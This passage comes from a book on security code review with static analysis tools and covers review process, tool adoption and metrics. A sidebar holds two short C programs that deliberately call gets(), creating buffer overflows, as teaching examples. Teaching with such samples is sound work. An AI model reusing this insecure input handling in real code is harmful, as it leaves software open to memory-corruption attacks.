You need to have enough high-level guidance to prioritize your potential code review targets. Set review priorities down to the level of individual programs. When you’ve gotten down to that granularity, don’t subdivide any further; run static analysis on at least a whole program at a time. You might choose to review results in more detail or with greater frequency for parts of the program if you believe they pose more risk, but allow the tool’s results to guide your attention, at least to some extent. At Fortify, we conduct line-by-line peer review for components that we deem to be high risk, but we always run tools against all of the code.

When we ask people what they’re looking for when they do code review, the most common thing we hear is, “Uh, err, the OWASP Top Ten?” Bad answer. The biggest problem is the “?” at the end. If you’re not too sure about what you’re looking for, chances are good that you’re not going to find it.
The “OWASP Top Ten” part isn’t so hot, either. Checking for the OWASP Top Ten is part of complying with the Payment Card Industry (PCI) Data Security Standard, but that doesn’t make it the beginning and end of the kinds of problems you should be looking for. If you need inspiration, examine the results of previous code reviews for either the program you’re planning to review or similar programs. Previously discovered errors have an uncanny way of slipping back in. Reviewing past results also gives you the opportunity to learn about what has changed since the previous review.

Make sure reviewers understand the purpose and function of the code being reviewed. A high-level description of the design helps a lot. It’s also the right time to review the risk analysis results relevant to the code. If reviewers don’t understand the risks before they begin, the relevant risks will inevitably be determined in an ad-hoc fashion as the review proceeds. The results will be less than ideal because the collective opinion about what is acceptable and what is unacceptable will evolve as the review progresses. The “I’ll know a security problem when I see it” approach doesn’t yield optimal results.

2. Run Static Analysis Tools

Run static analysis tools with the goals of the review in mind. To get started, you need to gather the target code, configure the tool to report the kinds of problems that pose the greatest risks, and disable checks that aren’t relevant. The output from this phase will be a set of raw results for use during code review. Figure 3.2 illustrates the flow through phases 2 and 3.

Figure 3.2 Steps 2 and 3: running the tool and reviewing the code. (In step 2, Run Tools, source code and rules feed the static analysis, which produces raw results; in step 3, Review Code, human review turns the raw results into findings.)

To get good results, you should be able to compile the code being analyzed.
For development groups operating in their own build environment, this is not much of an issue, but for security teams who’ve had the code thrown over the wall to them, it can be a really big deal. Where are all the header files? Which version of that library are you using? The list of snags and roadblocks can be lengthy. You might be tempted to take some shortcuts here. A static analysis tool can often produce at least some results even if the code doesn’t compile. Don’t cave. Get the code into a compilable state before you analyze it. If you get into the habit of ignoring parse errors and resolution warnings from the static analysis tool, you’ll eventually miss out on important results.

This is also the right time to add custom rules to detect errors that are specific to the program being analyzed. If your organization has a set of secure coding guidelines, go through them and look for things you can encode as custom rules. A static analysis tool won’t, by default, know what constitutes a security violation in the context of your code. Chances are good that you can dramatically improve the quality of the tool’s results by customizing it for your environment.

Errors found during previous manual code reviews are particularly useful here, too. If a previously identified error can be phrased as a violation of some program invariant (never do X, or always do Y), write a rule to detect similar situations. Over time, this set of rules will serve as a form of institutional memory that prevents previous security slip-ups from being repeated.

3. Review Code

Now it’s time to review the code with your own eyes. Go through the static analysis results, but don’t limit yourself to just analysis results. Allow the tool to point out potential problems, but don’t allow it to blind you to other problems that you can find through your own inspection of the code.
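The custom-rule advice from step 2 (phrase a past error as "never do X" and write a rule for it) can be sketched in a few lines. This is a toy checker built on Python's standard `ast` module, not the rule language of any commercial tool; the invariant it enforces ("never pass a non-literal command to `os.system`"), the function name `find_system_calls`, and the `SAMPLE` program are all assumptions made for illustration.

```python
import ast

MESSAGE = "os.system called with a non-literal command"


def find_system_calls(source, filename="<input>"):
    """Return sorted (line, message) pairs for calls that break the invariant
    'never pass a non-literal command to os.system'."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match only the spelling os.system(...); aliases are out of scope
        # for this sketch.
        is_os_system = (
            isinstance(func, ast.Attribute)
            and func.attr == "system"
            and isinstance(func.value, ast.Name)
            and func.value.id == "os"
        )
        if not is_os_system:
            continue
        # A single string literal argument is treated as safe.
        arg_is_literal = (
            len(node.args) == 1
            and isinstance(node.args[0], ast.Constant)
            and isinstance(node.args[0].value, str)
        )
        if not arg_is_literal:
            findings.append((node.lineno, MESSAGE))
    return sorted(findings)


# Hypothetical program under review: line 4 breaks the invariant.
SAMPLE = '''import os
os.system("ls")
cmd = input()
os.system(cmd)
'''

if __name__ == "__main__":
    for line, message in find_system_calls(SAMPLE):
        print(f"line {line}: {message}")
```

A rule this shallow misses aliased imports and any data flow, which is exactly the kind of gap a real tool's rule language is meant to close; the point is only that a reviewed mistake can be turned into a repeatable check.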
We routinely find other bugs right next door to a tool-reported issue. This “neighborhood effect” results from the fact that static analysis tools often report a problem when they become confused in the vicinity of a sensitive operation. Code that is confusing to tools is often confusing to programmers, too, although not always for the same reasons. Go through all the static analysis results; don’t stop with just the high-priority warnings. If the list is long, partition it so that multiple reviewers can share the work.

Reviewing a single issue is a matter of verifying the assumptions that the tool made when it reported the issue. Do mitigating factors prevent the code from being vulnerable? Is the source of untrusted data actually untrusted? Is the scenario hypothesized by the tool actually feasible? [1] If you are reviewing someone else’s code, it might be impossible for you to answer all these questions, and you should collaborate with the author or owner of the code. Some static analysis tools make it easy to share results (for instance, by publishing an issue on an internal Web site), which simplifies this process.

Collaborative auditing is a form of peer review. Structured peer reviews are a proven technique for identifying all sorts of defects [Wiegers, 2002; Fagan, 1976]. For security-focused peer review, it’s best to have a security specialist as part of the review team. Peer review and static analysis are complementary techniques. When we perform peer reviews, we usually put one reviewer in charge of going through tool output.

If, during the review process, you identify a problem that wasn’t found using static analysis, return to step 2: Write custom rules to detect other instances of the same problem and rerun the tools. Human eyes are great for spotting new varieties of defects, and static analysis excels at making sure that every instance of those new problems has been found. The back edge from step 3 to step 2 in Figure 3.1 represents this work.

[1] Michael Howard outlines a structured process for answering questions such as these in a security and privacy article entitled “A Process for Performing Security Code Reviews” [Howard, 2006].

Code review results can take a number of forms: bugs entered into the bug database, a formal report suitable for consumption by both programmers and management, entries into a software security tracking system, or an informal task list for programmers. No matter what the form is, make sure the results have a permanent home so that they’ll be useful during the next code review. Feedback about each issue should include a detailed explanation of the problem, an estimate of the risk it brings, and references to relevant portions of the security policy and risk assessment documents. This permanent collection of review results is good for another purpose, too: input for security training. You can use review results to focus training on real problems and topics that are most relevant to your code.

4. Make Fixes

Two factors control the way programmers respond to the feedback from a security review:

• Does security matter to them? If getting security right is a prerequisite for releasing their code, it matters. Anything less is shaky ground because it competes with adding new functionality, fixing bugs, and making the release date.
• Do they understand the feedback? Understanding security issues requires security training. It also requires the feedback to be written in an intelligible manner. Results stemming from code review are not concrete the way a failing test case is, so they require a more complete explanation of the risk involved.

If security review happens early enough in the development lifecycle, there will be time to respond to the feedback from the security review. Is there a large clump of issues around a particular module or a particular feature?
It might be time to step back and look for design alternatives that could alleviate the problem. Alternatively, you might find that the best and most lasting fix comes in the form of additional security training.

When programmers have fixed the problems identified by the review, the fixes must be verified. The form that verification takes depends on the nature of the changes. If the risks involved are not small and the changes are nontrivial, return to the review phase and take another look at the code. The back edge from step 4 to step 3 in Figure 3.1 represents this work.

Steer Clear of the Exploitability Trap

Security review should not be about creating flashy exploits, but all too often, review teams get pulled down into exploit development. To understand why, consider the three possible verdicts that a piece of code might receive during a security review:

• Obviously exploitable
• Ambiguous
• Obviously secure

No clear dividing line exists between these cases; they form a spectrum. The endpoints on the spectrum are less trouble than the middle; obviously exploitable code needs to be fixed, and obviously secure code can be left alone. The middle case, ambiguous code, is the difficult one. Code might be ambiguous because its logic is hard to follow, because it’s difficult to determine the cases in which the code will be called, or because it’s hard to see how an attacker might be able to take advantage of the problem.

The danger lies in the way reviewers treat the ambiguous code. If the onus is on the reviewer to prove that a piece of code is exploitable before it will be fixed, the reviewer will eventually make a mistake and overlook an exploitable bug. When a programmer says, “I won’t fix that unless you can prove it’s exploitable,” you’re looking at the exploitability trap.
(For more ways programmers try to squirm out of making security fixes, see the sidebar “Five Lame Excuses for Not Fixing Bad Code.”)

The exploitability trap is dangerous for two reasons. First, developing exploits is time consuming. The time you put into developing an exploit would almost always be better spent looking for more problems. Second, developing exploits is a skill unto itself. What happens if you can’t develop an exploit? Does it mean the defect is not exploitable, or that you simply don’t know the right set of tricks for exploiting it?

Don’t fall into the exploitability trap: Get the bugs fixed! If a piece of code isn’t obviously secure, make it obviously secure. Sometimes this approach leads to a redundant safety check. Sometimes it leads to a comment that provides a verifiable way to determine that the code is okay. And sometimes it plugs an exploitable hole. Programmers aren’t always wild about the idea of changing a piece of code when no error can be demonstrated because any change brings with it the possibility of introducing a new bug. But the alternative, shipping vulnerabilities, is even less attractive.

Beyond the risk that an overlooked bug might eventually lead to a new exploit is the possibility that the bug might not even need to be exploitable to cause damage to a company’s reputation. For example, a “security researcher” who finds a new buffer overflow might be able to garner fame and glory by publishing the details, even if it is not possible to build an attack around the bug [Wheeler, 2005]. Software companies sometimes find themselves issuing security patches even though all indications are that a defect isn’t exploitable.

Five Lame Excuses for Not Fixing Bad Code

Programmers who haven’t figured out software security come up with some inspired reasons for not fixing bugs found during security review. “I don't think that's exploitable” is the all-time winner.
All the code reviewers we know have their own favorite runners-up, but here are our favorite specious arguments for ignoring security problems:

1. “I trust system administrators.” Even though I know they’ve misconfigured the software before, I know they’re going to get it right this time, so I don’t need code that verifies that my program is configured reasonably.
2. “You have to authenticate before you can access that page.” How on earth would an attacker ever get a username and a password? If you have a username and a password, you are, by definition, a good guy, so you won’t attack the system.
3. “No one would ever think to do that!” The user manual very clearly states that names can be no longer than 26 characters, and the GUI prevents you from entering any more than 26 characters. Why would I need to perform a bounds check when I read a saved file?
4. “That function call can never fail.” I’ve run it a million times on my Windows desktop. Why would it fail when it runs on the 128-processor Sun server?
5. “We didn’t intend for that to be production-ready code.” Yes, we know it’s been part of the shipping product for several years now, but when it was written, we didn’t expect it to be production ready, so you should review it with that in mind.

3.2 Adding Security Review to an Existing Development Process [2]

It’s easy to talk about integrating security into the software development process, but it can be a tough transition to make if programmers are in the habit of ignoring security. Evaluating and selecting a static analysis tool can be the easiest part of a software security initiative. Tools can make programmers more efficient at tackling the software security problem, but tools alone cannot solve the problem. In other words, static analysis should be used as part of a secure development lifecycle, not as a replacement for a secure development lifecycle.
Any successful security initiative requires that programmers buy into the idea that security is important. In traditional hierarchical organizations, that usually means a dictum from management on the importance of security, followed by one or more signals from management that security really should be taken seriously. The famous 2002 memo from Bill Gates titled “Trustworthy Computing” is a perfect example of the former. In the memo, Gates wrote:

    So now, when we face a choice between adding features and resolving security issues, we need to choose security.

Microsoft signaled that it really was serious about security when it called a halt to Windows development in 2002 and had the entire Windows division (upward of 8,000 engineers) participate in a security push that lasted for more than two months [Howard and Lipner, 2006].

Increasingly, the arrival of a static analysis tool is part of a security push. For that reason, adoption of static analysis and adoption of an improved process for security are often intertwined. In this section, we address the hurdles related to tool adoption. Before you dive in, read the adoption success stories in the sidebar “Security Review Times Two.”

[2] This section began as an article in IEEE Security & Privacy Magazine, co-authored with Pravir Chandra and John Steven [Chandra, Chess, Steven, 2006].

Security Review Times Two

Static analysis security tools are new enough that, to our knowledge, no formal studies have been done to measure their impact on the software built by large organizations. But as part of our work at Fortify, we’ve watched closely as our customers have rolled out our tools to their development teams and security organizations. Here we describe the results we’ve seen at two large financial services companies.
Because the companies don't want their names to be used, we'll call them “East Coast” and “West Coast.”

East Coast

A central security team is charged with doing code review. Before adopting a tool, the team reviewed 10 million lines of code per year. With Fortify, they are now reviewing 20 million lines of code per year. As they have gained familiarity with static analysis, they have written custom rules to enforce larger portions of their security policy. The result is that, as the tools do more of the review work, the human reviewers continue to become more efficient. In the coming year, they plan to increase the rate of review to 30 million lines of code per year without growing the size of the security team. Development groups at the company are starting to adopt the tool, too; more than 100 programmers use the tool as part of the development process, but the organization has not yet measured the impact of developer adoption on the review process.

West Coast

A central security team is charged with reviewing all Internet-facing applications before they go to production. In the past, it took the security team three to four weeks to perform a review. Using static analysis, the security team now conducts reviews in one to two weeks. The security team expects to further reduce the review cycle time by implementing a process wherein the development team can run the tool and submit the results to the security team. (This requires implementing safeguards to ensure that the development team runs the analysis correctly.) The target is to perform code review for most projects in one week.

The security team is confident that, with the addition of source code analysis to the review process, they are now finding 100% of the issues in the categories they deem critical (such as cross-site scripting). The previous manual inspection process did not allow them to review every line of code, leaving open the possibility that some critical defects were being overlooked.
Development teams are also using static analysis to perform periodic checks before submitting their code to the security team. Several hundred programmers have been equipped with the tool. The result is that the security team now finds critical defects only rarely. (In the past, finding critical defects was the norm.) This has reduced the number of schedule slips and the number of “risk-managed deployments” in which the organization is forced to field an application with known vulnerabilities. The reduction in critical defects also significantly improves policy enforcement because when a security problem does surface, it now receives appropriate attention.

As a side benefit, development teams report that they routinely find non-security defects as a result of their code review efforts.

Adoption Anxiety

All the software development organizations we’ve ever seen are at least a little bit chaotic, and changing the behavior of a chaotic system is no mean feat. At first blush, adopting a static analysis tool might not seem like much of a problem. Get the tool, run the tool, fix the problems, and you’re done. Right? Wrong. It’s unrealistic to expect attitudes about security to change just because you drop off a new tool. Adoption is not as easy as leaving a screaming baby on the doorstep. Dropping off the tool and waving goodbye will lead to objections like the ones in Table 3.1.

Table 3.1 Commonly voiced objections to static analysis and their true meaning.

Objection                                  Translation
"It takes too long to run."                "I think security is optional, and since it requires effort, I don't want to do it."
"It has too many false positives."         "I think security is optional, and since it requires effort, I don't want to do it."
"It doesn't fit in to the way I work."     "I think security is optional, and since it requires effort, I don't want to do it."
In our experience, three big questions must be answered to adopt a tool successfully. An organization’s size, along with the style and maturity of its development processes, all play heavily into the answers to these questions. None of them has a one-size-fits-all answer, so we consider the range of likely answers to each. The three questions are:

• Who runs the tool?
• When is the tool run?
• What happens to the results?

Who Runs the Tool?

Ideally, it wouldn’t matter who actually runs the tool, but a number of practical considerations make it an important question, such as access to the code. Many organizations have two obvious choices: the security team or the programmers.

The Security Team

For this to work, you must ensure that your security team has the right skill set; in short, you want security folks with software development chops. Even if you plan to target programmers as the main consumers of the information generated by the tool, having the security team participate is a huge asset. The team brings risk management experience to the table and can often look at big-picture security concerns, too. But the security team didn’t write the code, so team members won’t have as much insight into it as the developers who did. It’s tough for the security team to go through the code alone. In fact, it can be tricky to even get the security team set up so that they can compile the code. (If the security team isn’t comfortable compiling other people’s code, you’re barking up the wrong tree.) It helps if you already have a process in place for the security team to give code-level feedback to programmers.

The Programmers

Programmers possess the best knowledge about how their code works. Combine this with the vulnerability details provided by a tool, and you’ve got a good reason to allow development to run the operation. On the flip side, programmers are always under pressure to build a product on a deadline.
It’s also likely that, even with training, they won’t have the same level of security knowledge or expertise as members of the security team. If the programmers will run the tool, make sure they have time built into their schedule for it, and make sure they have been through enough security training that they’ll be effective at the job. In our experience, not all programmers will become tool jockeys. Designate a senior member of each team to be responsible for running the tool, making sure the results are used appropriately, and answering tool-related questions from the rest of the team.

All of the Above

A third option is to have programmers run the tools in a mode that produces only high-confidence results, and use the security team to conduct more thorough but less frequent reviews. This imposes less of a burden on the programmers, while still allowing them to catch some of their own mistakes. It also encourages interaction between the security team and the development team. No question about it, joint teams work best. Every so often, buy some pizzas and have the development team and the security team sit down and run the tool together. Call it eXtreme Security, if you like.

When Is the Tool Run?

More than anything else, deciding when the tool will be run determines the way the organization approaches security review. Many possible answers exist, but the three we see most often are these: while the code is being written, at build time, and at major milestones. The right answer depends on how the analysis results will be consumed and how much time it takes to run the tool.

While the Code Is Being Written

Studies too numerous to mention have shown that the cost of fixing a bug increases over time, so it makes sense to check new code promptly.
One way to accomplish this is to integrate the source code analysis tool into the programmer’s development environment so that the programmer can run on-demand analysis and gain expertise with the tool over time. An alternate method is to integrate scanning into the code check-in process, thereby centralizing control of the analysis. (This approach costs the programmers in terms of analysis freedom, but it’s useful when desktop integration isn’t feasible.) If programmers will run the tool a lot, the tool needs to be fast and easy to use. For large projects, that might mean asking each developer to analyze only his or her portion of the code and then running an analysis of the full program at build time or at major milestones.

At Build Time

For most organizations, software projects have a well-defined build process, usually with regularly scheduled builds. Performing analysis at build time gives code reviewers a reliable report to use for direct remediation, as well as a baseline for further manual code inspection. Also, by using builds as a timeline for source analysis, you create a recurring, consistent measure of the entire project, which provides perfect input for analysis-driven metrics. This is a great way to get information to feed a training program.

At Major Milestones

Organizations that rely on heavier-weight processes have checkpoints at project milestones, generally near the end of a development cycle or at some large interval during development. These checkpoints sometimes include security-related tasks such as a design review or a penetration test. Logically extending this concept, checkpoints seem like a natural place to use a static analysis tool. The downside to this approach is that programmers might put off thinking about security until the milestone is upon them, at which point other milestone obligations can push security off to the sidelines.
If you’re going to wait for milestones to use static analysis, make sure you build some teeth into the process. The consequences for ignoring security need to be immediately obvious and known to all ahead of time.

What Happens to the Results?

When people think through the tool adoption process, they sometimes forget that most of the work comes after the tool is run. It’s important to decide ahead of time how the actual code review will be performed.

Output Feeds a Release Gate

The security team processes and prioritizes the tool’s output as part of a checkpoint at a project milestone. The development team receives the prioritized results along with the security team’s recommendations about what needs to be fixed. The development team then makes decisions about which problems to fix and which to classify as “accepted risks.” (Development teams sometimes use the results from a penetration test the same way.) The security team should review the development team’s decisions and escalate cases where it appears that the development team is taking on more risk than it should. If this type of review can block a project from reaching a milestone, the release gate has real teeth. If programmers can simply ignore the results, they will have no motivation to make changes.

The gate model is a weak approach to security for the same reason that penetration testing is a weak approach to security: It’s reactive. Even though the release gate is not a good long-term solution, it can be an effective stepping stone. The hope is that the programmers will eventually get tired of having their releases waylaid by the security team and decide to take a more proactive approach.

A Central Authority Doles Out Individual Results

A core group of tool users can look at the reported problems for one or more projects and pick the individual issues to send to the programmers responsible for the code in question.
In such cases, the static analysis tool should report everything it can; the objective is to leave no stone unturned. False positives are less of a concern because a skilled analyst processes the results prior to the final report. With this model, the core group of tool users becomes skilled with the tools in short order and becomes adept at going through large numbers of results.

A Central Authority Sets Pinpoint Focus

Because of the large number of projects that might exist in an organization, a central distribution approach to results management can become constrained by the number of people reviewing results, even if reviewers are quite efficient. However, it is not unusual for a large fraction of the acute security pain to be clustered tightly around just a small number of types of issues. With this scenario, the project team will limit the tool to a small number of specific problem types, which can grow or change over time according to the risks the organization faces. Ultimately, defining a set of in-scope problem types works well as a centrally managed policy, standard, or set of guidelines. It should change only as fast as the development team can adapt and account for all the problems already in scope. On the whole, this approach gives people the opportunity to become experts incrementally through hands-on experience with the tool over time.

Start Small, Ratchet Up

Security tools tend to come preconfigured to detect as much as they possibly can. This is helpful if you’re trying to figure out what a tool is capable of detecting, but it can be overwhelming if you’re assigned the task of going through every issue. No matter how you answer the adoption questions, our advice here is the same: Start small. Turn off most of the things the tool detects and concentrate on a narrow range of important and well-understood problems.
Broaden out only when there’s a process in place for using the tool and the initial batch of problems is under control. No matter what you do, a large body of existing code won’t become perfect overnight. The people in your organization will thank you for helping them make some prioritization decisions.

3.3 Static Analysis Metrics

Metrics derived from static analysis results are useful for prioritizing remediation efforts, allocating resources among multiple projects, and getting feedback on the effectiveness of the security process. Ideally, one could use metrics derived from static analysis results to help quantify the amount of risk associated with a piece of code, but using tools to measure risk is tricky. The most obvious problem is the unshakable presence of false positives and false negatives, but it is possible to compensate for them. By manually auditing enough results, a security team can predict the rate at which false positives and false negatives occur for a given project and extrapolate the number of true positives from a set of raw results.

A deeper problem with using static analysis to quantify risk is that there is no good way to sum up the risk posed by a set of vulnerabilities. Are two buffer overflows twice as risky as a single buffer overflow? What about ten? Code-level vulnerabilities identified by tools simply do not sum into an accurate portrayal of risk. See the sidebar “The Density Deception” to understand why. Instead of trying to use static analysis output to directly quantify risk, use it as a tactical way to focus security efforts and as an indirect measure of the process used to create the code.

The Density Deception

In the quality assurance realm, it’s normal to compute the defect density for a piece of code by dividing the number of known bugs by the number of lines of code. Defect density is often used as a measure of quality.
It might seem intuitive that one could use static analysis output to compute a “vulnerability density” to measure the amount of risk posed by the code. It doesn’t work. We use two short example programs with some blatant vulnerabilities to explain why. First up is a straight-line program:

     1 /* This program computes Body Mass Index (BMI). */
     2 int main(int argc, char** argv)
     3 {
     4   char heightString[12];
     5   char weightString[12];
     6   int height, weight;
     7   float bmi;
     8
     9   printf("Enter your height in inches: ");
    10   gets(heightString);
    11   printf("Enter your weight in pounds: ");
    12   gets(weightString);
    13   height = atoi(heightString);
    14   weight = atoi(weightString);
    15   bmi = ((float)weight/((float)height*height)) * 703.0;
    16
    17   printf("\nBody mass index is %2.2f\n\n", bmi);
    18 }

The program has 18 lines, and any static analysis tool will point out two glaring buffer overflow vulnerabilities: the calls to gets() on lines 10 and 12. Divide 2 by 18 for a vulnerability density of 0.111. Now consider another program that performs exactly the same computation:

     1 /* This program computes Body Mass Index (BMI). */
     2 int main(int argc, char** argv)
     3 {
     4   int height, weight;
     5   float bmi;
     6
     7   height = getNumber("Enter your height in inches");
     8   weight = getNumber("Enter your weight in pounds");
     9   bmi = ((float)weight/((float)height*height)) * 703.0;
    10
    11   printf("\nBody mass index is %2.2f\n\n", bmi);
    12 }
    13
    14 int getNumber(char* prompt) {
    15   char buf[12];
    16   printf("%s: ", prompt);
    17   return atoi(gets(buf));
    18 }

This program calls gets(), too, but it uses a separate function to do it. The result is that a static analysis tool will report only one vulnerability (the call to gets() on line 17). Divide 1 by 18 for a vulnerability density of 0.056. Whoa. The second program is just as vulnerable as the first, but its vulnerability density is 50% smaller!
The moral to the story is that the way the program is written has a big impact on the vulnerability density. This makes vulnerability density completely meaningless when it comes to quantifying risk. (Stay tuned. Even though vulnerability density is terrible in this context, the next section describes a legitimate use for it.)

Metrics for Tactical Focus

Many simple metrics can be derived from static analysis results. Here we look at the following:

• Measuring vulnerability density
• Comparing projects by severity
• Breaking down results by category
• Monitoring trends

Measuring Vulnerability Density

We’ve already thrown vulnerability density under the bus, so what more is there to talk about? Dividing the number of static analysis results by the number of lines of code is an awful way to measure risk, but it’s a good way to measure the amount of work required to do a complete review. Comparing vulnerability density across different modules or different projects helps formulate review priorities. Track issue density over time to gain insight into whether tool output is being taken into consideration.

Comparing Projects by Severity

Static analysis results can be applied for project comparison purposes. Figure 3.3 shows a comparison between two modules, with the source code analysis results grouped by severity. The graph suggests a plan of action: Check out the critical issues for the first module, and then move on to the high-severity issues for the second.

Comparing projects side by side can help people understand how much work they have in front of them and how they compare to their peers. When you present project comparisons, name names. Point fingers. Sometimes programmers need a little help accepting responsibility for their code. Help them.

[Figure 3.3: bar chart for the Orion Project and the Tilde Project. x-axis: Severity (Critical, High, Medium, Low); y-axis: Issues (0 to 50).]
Figure 3.3 Source code analysis results broken down by severity for two subprojects.
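The density arithmetic from the Measuring Vulnerability Density discussion is simple enough to sketch in C. The block below is a minimal illustration and not part of the original text: the struct `module_stats` and the functions `issue_density` and `densest_module` are hypothetical names chosen for this example. It divides the number of reported issues by the lines of code and picks the module with the highest density as the first candidate for review, which is the work-estimation use described above, not a measurement of risk.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical per-module summary of one static analysis run. */
struct module_stats {
    const char *name;
    unsigned issues;         /* number of reported results */
    unsigned lines_of_code;  /* must be nonzero */
};

/* Issues per line of code: a rough proxy for review effort, not for risk. */
double issue_density(const struct module_stats *m)
{
    assert(m != NULL && m->lines_of_code > 0);
    return (double)m->issues / (double)m->lines_of_code;
}

/* Index of the module with the highest density (the first one wins a tie). */
size_t densest_module(const struct module_stats *mods, size_t count)
{
    assert(mods != NULL && count > 0);
    size_t best = 0;
    for (size_t i = 1; i < count; i++) {
        if (issue_density(&mods[i]) > issue_density(&mods[best])) {
            best = i;
        }
    }
    return best;
}
```

Fed the two BMI programs from the sidebar (2 issues in 18 lines and 1 issue in 18 lines), `issue_density` gives values that differ by a factor of two even though the programs are equally vulnerable. That is why the number is suited to ordering review work and not to quantifying risk.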
Breaking Down Results by Category

Figure 3.4 presents results for a single project grouped by category. The pie chart gives a rough idea about the amount of remediation effort required to address each type of issue. It also suggests that log forging and cross-site scripting are good topics for an upcoming training class.

[Figure 3.4: pie chart. Log Forging (12), Cross-Site Scripting (12), Privacy Violation (3), Race Condition (2), Password Management (1).]
Figure 3.4 Source code analysis results broken down by category.

Monitoring Trends

Source code analysis results can also point out trends over time. Teams that are focused on security will decrease the number of static analysis findings in their code. A sharp increase in the number of issues found deserves attention. Figure 3.5 shows the number of issues found during a series of nightly builds. For this particular project, the number of issues found on February 2 spikes because the development group has just taken over a module from a group that has not been focused on security.

[Figure 3.5: line chart. x-axis: Date (29-Jan through 4-Feb); y-axis: Issues (0 to 50).]
Figure 3.5 Source code analysis results from a series of nightly builds. The spike in issues on February 2 reflects the incorporation of a module originally written by a different team.

Process Metrics

The very presence of some types of issues can serve as an early indicator of more widespread security shortcomings [Epstein, 2006]. Determining the kinds of issues that serve as bellwether indicators requires some experience with the particular kind of software being examined. In our experience, a large number of string-related buffer overflow issues is a sign of trouble for programs written in C.

More sophisticated metrics leverage the capacity of the source code analyzer to give the same issue the same identifier across different builds.
(See Chapter 4, “Static Analysis Internals,” for more information on issue identifiers.) By following the same issue over time and associating it with the feedback provided by a human auditor, the source code analyzer can provide insight into the evolution of the project. For example, static analysis results can reveal the way a development team responds to security vulnerabilities. After an auditor identifies a vulnerability, how long, on average, does it take for the programmers to make a fix? We call this vulnerability dwell. Figure 3.6 shows a project in which the programmers fix critical vulnerabilities within two days and take progressively longer to address less severe problems.

[Figure 3.6: horizontal bar chart titled “Vulnerability Dwell.” y-axis: Severity; x-axis: Days (log scale, 1 to 100). Critical: 2, High: 4, Medium: 25, Low: 60.]
Figure 3.6 Vulnerability dwell as a function of severity. When a vulnerability is identified, vulnerability dwell measures how long it remains in the code. (The x-axis uses a log scale.)

Static analysis results can also help a security team decide when it’s time to audit a piece of code. The rate of auditing should keep pace with the rate of development. Better yet, it should keep pace with the rate at which potential security issues are introduced into the code. By tracking individual issues over time, static analysis results can show a security team how many unreviewed issues a project contains. Figure 3.7 presents a typical graph. At the point the project is first reviewed, audit coverage goes to 100%. Then, as the code continues to evolve, the audit coverage decays until the project is audited again.

Another view of this same data gives a more comprehensive view of the project. An audit history shows the total number of results, number of results reviewed, and number of vulnerabilities identified in each build. This view takes into account not just the work of the code reviewers, but the effect the programmers have on the project.
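The two process metrics described above, vulnerability dwell and audit coverage, reduce to simple arithmetic once issues carry stable identifiers across builds. The following C sketch is an illustration under assumptions: the function names, the use of day numbers as timestamps, and the choice to treat a build with no issues as fully covered are all made up for this example and do not come from any particular tool.

```c
#include <assert.h>
#include <stddef.h>

/* Percentage of reported issues that an auditor has reviewed in one build.
 * Assumption: a build with no issues counts as 100% covered. */
double audit_coverage_percent(unsigned reviewed, unsigned total)
{
    assert(reviewed <= total);
    if (total == 0) {
        return 100.0;
    }
    return 100.0 * (double)reviewed / (double)total;
}

/* Mean vulnerability dwell: the average number of days between the day an
 * auditor confirmed each issue and the day it disappeared from the code. */
double mean_dwell_days(const unsigned *found_day, const unsigned *fixed_day,
                       size_t count)
{
    assert(found_day != NULL && fixed_day != NULL && count > 0);
    double total = 0.0;
    for (size_t i = 0; i < count; i++) {
        assert(fixed_day[i] >= found_day[i]);
        total += (double)(fixed_day[i] - found_day[i]);
    }
    return total / (double)count;
}
```

Computing `mean_dwell_days` separately for each severity level would give the kind of breakdown shown in Figure 3.6, and calling `audit_coverage_percent` once per build would give the curve in Figure 3.7.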
Figure 3.8 shows results over roughly one month of nightly builds. At the same time the code review is taking place, development is in full swing, so the issues in the code continue to change. As the auditors work, they report vulnerabilities (shown in black). Around build 14, the auditors have looked at all the results, so the total number of results is the same as the number reviewed. Development work is not yet complete, though, and soon the project again contains unreviewed results. As the programmers respond to some of the vulnerabilities identified by the audit team, the number of results begins to decrease and some of the identified vulnerabilities are fixed. At the far-right side of the graph, the growth in the number of reviewed results indicates that reviewers are beginning to look at the project again.

[Figure 3.7: line chart. x-axis: Date (1-Jan through 1-Apr); y-axis: Percent Issues Reviewed (0% to 100%).]
Figure 3.7 Audit coverage over time. After all static analysis results are reviewed, the code continues to evolve and the percentage of reviewed issues begins to decline.

[Figure 3.8: chart with three series (Total Issues Found, Issues Reviewed, Vulnerabilities). x-axis: Build Number (1 to 28); y-axis: Issues (0 to 250).]
Figure 3.8 Audit history: the total number of static analysis results, the number of reviewed results, and the number of identified vulnerabilities present in the project.

Summary

Building secure systems takes effort, especially for organizations that aren’t used to paying much attention to security. Code review should be part of the software security process. When used as part of code review, static analysis tools can help codify best practices, catch common mistakes, and generally make the security process more efficient and consistent. But to achieve these benefits, an organization must have a well-defined code review process. At a high level, the process consists of four steps: defining goals, running tools, reviewing the code, and making fixes.
One symptom of an ineffective process is a frequent descent into a debate about exploitability.

To incorporate static analysis into the existing development process, an organization needs a tool adoption plan. The plan should lay out who will run the tool, when they’ll run it, and what will happen to the results. Static analysis tools are process agnostic, but the path to tool adoption is not. Take style and culture into account as you develop an adoption plan.

By tracking and measuring the security activities adopted in the development process, an organization can begin to sharpen its software security focus. The data produced by source code analysis tools can be useful for this purpose, giving insight into the kinds of problems present in the code, whether code review is taking place, and whether the results of the review are being acted upon in a timely fashion.

4 Static Analysis Internals

Those who say it cannot be done should not interrupt the people doing it.
(Chinese proverb)

This chapter is about what makes static analysis tools tick. We look at the internal workings of advanced static analysis tools, including data structures, analysis techniques, rules, and approaches to reporting results. Our aim is to explain enough about what goes into a static analysis tool that you can derive maximum benefit from the tools you use. For readers interested in creating their own tools, we hope to lay enough groundwork to provide a reasonable starting point.

Regardless of the analysis techniques used, all static analysis tools that target security function in roughly the same way, as shown in Figure 4.1. They all accept code, build a model that represents the program, analyze that model in combination with a body of security knowledge, and finish by presenting their results back to the user. This chapter walks through the process and takes a closer look at each step.
[Figure 4.1: block diagram. Source code (illustrated by a fragment that calls fgets(), strcpy(), and system()) feeds Build Model, followed by Perform Analysis, which also draws on Security Knowledge, followed by Present Results.]
Figure 4.1 A block diagram for a generic static analysis security tool. At a high level, almost all static analysis security tools work this way.

4.1 Building a Model

